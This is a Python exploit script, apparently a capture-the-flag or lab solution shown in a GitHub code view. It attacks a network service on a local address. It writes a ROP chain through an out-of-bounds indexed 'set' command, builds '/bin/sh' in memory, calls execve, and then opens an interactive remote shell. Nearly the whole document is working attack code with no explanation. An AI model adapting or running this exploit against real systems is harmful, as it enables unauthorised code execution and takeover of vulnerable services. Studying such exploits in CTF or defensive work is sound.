Permalink
Cannot retrieve contributors at this time
| import socket | |
| import struct | |
| IP="192.168.1.104" | |
| PORT=1337 | |
| s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
| s.connect((IP, PORT)) | |
| def run(data, result=None): | |
| if data: | |
| s.send(data+"\n") | |
| while result and not result in s.recv(1024): | |
| pass | |
| print("[*] Init") | |
| run(None, "> ") | |
| shellcode = [0x08053816, # pop edx; ret | |
| 1852400175, # /bin | |
| 0x080a8406, # pop eax; ret | |
| 0x080cb000, # bbs | |
| 0x08084138, # mov [eax], edx; pop ebx; pop ebp; ret | |
| 0, 0, | |
| 0x08053816, # pop edx; ret | |
| 6845231, # /sh\x00 | |
| 0x080a8406, # pop eax; ret | |
| 0x080cb004, # bbs + 4 | |
| 0x08084138, # mov [eax], edx; pop ebx; pop ebp; ret | |
| 0, 0, | |
| 0x080a8406, # pop eax; ret | |
| 0x0b, # sys_execve | |
| 0x0805383d, # pop ecx; pop ebx; ret | |
| 0x0, # arg@arg | |
| 0x080cb000, # filename@arg | |
| 0x08053816, # pop edx; ret | |
| 0x0, # evp@arg | |
| 0x08053f90 # int 0x80 | |
| ] | |
| print("[*] Write shellcode") | |
| for i in range(0, len(shellcode)): | |
| run("set", "> id: ") | |
| run(str(-255 + 21 + i), "> value: ") | |
| run(str(shellcode[i]), "> ") | |
| print("[*] Drop the bomb") | |
| run("exit", "Goodbye") | |
| s.send("echo 0wn3d\n") | |
| while True: | |
| print(s.recv(2048)) | |
| d = raw_input("$ ") | |
| s.send(d+"\n") |